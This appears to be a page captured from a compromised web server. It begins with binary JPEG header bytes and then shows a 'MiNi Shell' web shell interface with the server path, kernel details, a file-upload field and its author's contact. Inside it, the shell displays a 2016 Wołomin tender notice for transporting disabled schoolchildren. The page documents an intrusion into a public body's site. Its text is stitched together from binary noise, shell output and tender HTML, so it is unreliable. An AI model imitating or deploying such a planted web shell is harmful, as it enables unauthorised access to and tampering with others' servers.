JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160616/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160616/90151-N-2016.html

<p class="kh_header"><b>Wołomin: Przedmiot zamówienia: Przewóz uczniów niepełnosprawnych do szkół oraz ośrodków szkolno - wychowawczych, w tym zapewnienie im opiekuna</b><br>
<b>Numer ogłoszenia: 90151 - 2016; data zamieszczenia: 16.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Ekonomiczno-Administracyjny Szkół i Przedszkoli w Wołominie , ul. Ogrodowa 4, 05-200 Wołomin, woj. mazowieckie, tel. 22 7762505 w. 117, faks 22 7762610.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeasip.wolomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa j.s.t..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia: Przewóz uczniów niepełnosprawnych do szkół oraz ośrodków szkolno - wychowawczych, w tym zapewnienie im opiekuna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
Przewóz  uczniów  niepełnosprawnych do szkół oraz placówek szkolno - wychowawczych, w tym zapewnienie im opiekuna  (dowożenie do szkół i placówek szkolno-wychowawczych z miejsca zamieszkania do szkoły oraz odwożenie do domów po zakończonych zajęciach) w roku szkolnym 2016/2017 wg następujących tras:
Trasa nr 1
Wołomin, ul. Lipińska  do Specjalnego Ośrodka Szkolno - Wychowawczego w Warszawie, ul. Koźmińska 7 - 1 uczeń
Wołomin, ul. Mieszka I   do Instytutu Głuchoniemych w Warszawie, Plac Trzech Krzyży 4/6 - 1 uczeń 
Wołomin, os. Słoneczna do Zespołu Szkół Specjalnych nr 95 w Warszawie, ul. Hafciarska 80/86 - 1 uczeń
Trasa nr 2
Wołomin, ul. Sikorskiego  - 1 uczeń (wózek)
Wołomin, ul. Lipińska - 1 uczeń 
do Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Wołominie, ul. Piłsudskiego 13
Wołomin, ul. Mieszka I  - 1 uczeń
Wołomin, ul. Kobyłkowska  - 1 uczeń
Wołomin, Lipińska  - 1 uczeń (wózek)
Wołomin, ul. Prądzyńskiego - 1 uczeń
Wołomin, ul. Leśna - 1 uczeń
do Zespołu Szkół Specjalnych w Wołominie, ul. Miła 22 
Trasa nr 3
Stare Grabie, ul. Główna  - 1 uczeń (wózek)
do Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Wołominie, ul. Piłsudskiego 13
Wołomin, ul. Szarych Szeregów  - 1 uczeń (wózek)
Wołomin, ul. Kościuszki  - 1 uczeń 
Wołomin, ul. Sikorskiego - 1 uczeń (wózek)
do Ośrodka Rehabilitacyjno-Edukacyjno-Wychowawczego w Wołominie, ul. Piłsudskiego 4
Duczki, ul. Miła  - 1 uczeń (dowóz w jedną stronę do szkoły)
do Zespołu Szkół nr  4   w Wołominie, ul. 1 Maja 19
Lipinki, ul. Barwna  - 1 uczeń
Zagościniec, ul. Truskawkowa - 1 uczeń
Duczki, ul. Jaroszewska - 1 uczeń
do Zespołu Szkół Specjalnych w Wołominie, ul. Miła 22
Duczki, ul Szosa Jadowska - 1 uczeń do Niepublicznego Terapeutycznego Punkt Przedszkolnego Vitautia, Wołomin, ul. Sikorskiego 29c
(zajęcia od 1.09.2016 r. - 31.08.2017 r.)
Trasa nr 4
Wołomin, ul. Prądzyńskiego - 1 uczeń (poniedziałki i piątki)
Wołomin, ul. Niepodległości  - 1 uczeń
Wołomin, ul. Warszawska - 1 uczeń
Wołomin, ul. Starowiejska  - 1 uczeń
Wołomin, ul. Długa  - 1 uczeń (wózek, zajęcia od godz. 8.00 - 12.15)
Zagościniec, ul. Mokra  - 1 uczeń 
Lipiny Nowe, ul. Batalionów Chłopskich - 1 uczeń (wózek) 
Nowe Grabie  - 1 uczeń 
Wołomin, Al. Niepodległości - 1 uczeń
Ossów, ul. Matarewicza - 1 uczeń
do Zespołu Szkół Specjalnych w Ostrówku, ul. Abpa Z. Felińskiego 1
Trasa nr 5
Wołomin, ul. Marszałkowska - 1 uczeń
Wołomin, ul. Sikorskiego - 1 uczeń
do Zespołu Szkół Specjalnych w Wołominie, ul. Miła 22 
Wołomin, ul. Starowiejska - 1 uczeń 
do Szkoły Podstawowej nr 7 w Wołominie, ul. Poprzeczna 6 
Wołomin, ul. Okopowa - 1 uczeń (wózek)
Wołomin, ul. Kobyłkowska - 1 uczeń (wózek) 
Wołomin, ul. Średnia - 1 uczeń 
do Zespołu Szkół nr 4 w Wołominie, ul. 1 Maja 19
(uczniowie rozpoczynają i kończą zajęcia  o różnych godzinach)
Trasa nr 6
Wołomin, ul. Konopnickiej - 1 uczeń
do Ośrodka Szkolno - Wychowawczego w Lesznie (w poniedziałki  i piątki)
Trasa nr 7
Wołomin, ul. Matejki - 1 uczeń
Wołomin, ul. Chrobrego - 1 uczeń (wózek)
do Zespołu Szkół w Zielonce, ul. Inżynierska 1 (uczniowie rozpoczynają i kończą zajęcia  o różnych godzinach)
Jeżeli będzie to konieczne, Wykonawca uwzględni indywidualny dowóz ucznia na zajęcia.

Zamawiający nie dopuszcza możliwości łączenia tras stanowiących przedmiot zamówienia przez Wykonawcę z przewozami innych osób.

Liczba uczniów dowożonych w roku szkolnym 2016/2017 może ulec zmianie.  
Zamawiający nie poniesie dodatkowych kosztów w przypadku zwiększenia liczby dowożonych uczniów zamieszkałych w obrębie wyznaczonych tras.  
Lista uczniów wraz z adresami i danymi kontaktowymi zostanie udostępniona Wykonawcy po podpisaniu umowy. Szczegóły dowozów uczniów, np. godziny, dni itp. Wykonawca ustali bezpośrednio z rodzicami każdego dziecka. 
Wykonawca ustali optymalny harmonogram, mając na uwadze jak najkrótszy czas przebywania ucznia w podróży. Rozkład ten musi być ułożony w taki sposób, aby każde uczeń był dowieziony do szkoły, w takim czasie, aby możliwe było rozpoczęcie przez niego o czasie zajęć lekcyjnych i zabieranie go po zakończonych zajęciach, bez nieuzasadnionego oczekiwania.
W trakcie przewozu na trasie dom-szkoła-dom uczniowie muszą mieć zapewnioną opiekę przez osobę pełnoletnią, posiadającą przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej. Zamawiający nie dopuszcza łączenia tej funkcji z funkcją kierowcy środka transportu.
Do obowiązków opiekuna należeć będzie w szczególności:
- odbiór uczniów od rodziców/opiekunów prawnych  z miejsca zamieszkania i po dotarciu do szkoły odprowadzenie ich do szkoły,
- odbiór uczniów ze szkoły i przekazanie ich rodzicom/prawnym opiekunom lub osobom upoważnionym przez rodzica/prawnego opiekuna,
- w razie konieczności pomoc przy wsiadaniu i wysiadaniu z samochodu,
- bieżąca opieka nad uczniami w czasie transportu, w tym pomoc w razie zagrożenia życia lub zdrowia uczniów,
- posiadanie w trakcie wykonywania usługi, telefonu komórkowego zapewniającego nieograniczony kontakt telefoniczny, którego numer Wykonawca przekazuje rodzicom/prawnym opiekunom dzieci dowożonych.
Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania przedmiotu zamówienia. Wykonawca zapewni do wykonania usługi na jeden pojazd jednego kierowcę (mającego co najmniej dziesięcioletnie doświadczenie w kierowaniu pojazdami) i osobę posiadającą przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej.

Wykonawca powinien dysponować odpowiednią ilością pojazdów umożliwiających realizację przedmiotu zamówienia.   
Zamawiający wymaga, aby pojazdy, którymi świadczona będzie usługa transportu uczniów niepełnosprawnych były w pełni sprawne technicznie. 
Wyposażenie samochodów musi gwarantować komfort i bezpieczeństwo podróży uczniów. Wykonawca musi posiadać pojazdy przystosowane do przewozu uczniów niepełnosprawnych, poruszających się na wózkach. Wykonawca nie musi posiadać pojazdu z podnośnikiem lub windą w przypadku gdy niepełnosprawność dziecka pozwala na jego samodzielne poruszanie się..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje powierzenie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego. 
Wartość ewentualnych zamówień uzupełniających będzie ustalana pomiędzy Zamawiającym a wybranym Wykonawcą na drodze szacunku (zestawienie zamówienia uzupełniającego ze stawkami zaproponowanymi w ofercie). Przed powierzeniem ewentualnych zamówień uzupełniających Wykonawca przedstawi Zamawiającemu do akceptacji koszt wykonywania zadania uzupełniającego. W przypadku braku porozumienia pomiędzy Zamawiającym a Wykonawcą odnośnie kosztów za zamówienie uzupełniające, zamawiający może powierzyć je innemu podmiotowi</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium w kwocie: 
7000,00 PLN (słownie: pięć tysięcy złotych)
2. Wadium należy wnieść przed upływem terminu składania ofert.
3. Wadium w formie pieniężnej (art. 45 ust. 6 ustawy Pzp)  należy wnieść przelewem na rachunek bankowy Zamawiającego w PEKAO S.A., nr: 67 1240 6074 1111 0010 4009 1432 z adnotacją: WADIUM - przetarg na przewóz uczniów niepełnosprawnych. Dowód wniesienia wadium należy dołączyć do oferty.
4. Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z zapisami ustawy zostanie wykluczony.
5. Zwrot lub zatrzymanie wadium nastąpi zgodnie z art. 46 ustawy Prawo zamówień publicznych:
	Zwrot wadium dla Wykonawcy:
1)	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania - z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
2)	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego, 
3)	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert, 
Utrata wadium na rzecz Zamawiającego:
1)	Zamawiający zatrzymuje wadium wraz z odsetkami w następujących okolicznościach: - jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy -nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw  chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie, 
2)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
b.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca przedstawi odpowiednią koncesję, zezwolenie lub licencję na wykonywanie transportu drogowego osób, jeżeli ustawy nakładają obowiązek posiadania stosownej koncesji, zezwolenia lub licencji w zakresie przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia. Przez usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia Zamawiający rozumie usługi w zakresie dowożenia dzieci niepełnosprawnych, realizowanych w ramach nie mniej niż 2 usług realizowanych w sposób ciągły tzn. nieprzerwanie przez okres 10 - 12 miesięcy na kwotę większą lub równą  400.000,00 zł brutto każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca przedłoży: wykaz odpowiedniej ilości pojazdów,  umożliwiający realizację przedmiotu zamówienia, których wyposażenie musi gwarantować komfort i bezpieczeństwo podróży dzieci, wraz z informacją o podstawie dysponowania tymi zasobami - załącznik nr 7 do SIWZ  (wykonawca winien przedłożyć kopie dowodów rejestracyjnych pojazdów w  tym pojazdów przystosowanych do przewozu osób niepełnosprawnych - rok produkcji pojazdu nie wcześniej niż 2007 r., w ilości co najmniej siedem samochodów)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca przedłoży: wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia posiadających odpowiednie uprawnienia (opiekun - udokumentowane przeszkolenie w zakresie udzielania pierwszej pomocy przedmedycznej, kierowca - mający co najmniej dziesięcioletnie doświadczenie w kierowaniu pojazdami) - załącznik nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony, jeżeli Wykonawca przedłoży:
opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę 400 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowy - Załącznik Nr 1 do SIWZ (złożony w oryginale);
2)	podpisany wzór umowy - Załącznik nr 4 do SIWZ
3)	dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 93</li>
<li>2 - rok produkcji proponowanych do wykonania zadania pojazdów - 7</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zeasip.wolomin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno - Administracyjny Szkół i Przedszkoli w Wołominie, ul. Ogrodowa 4, 05-200 Wołomin, pok. 326.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 09:00, miejsce: Zespół Ekonomiczno - Administracyjny Szkół i Przedszkoli w Wołominie, ul. Ogrodowa 4, 05-200 Wołomin, pok. 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com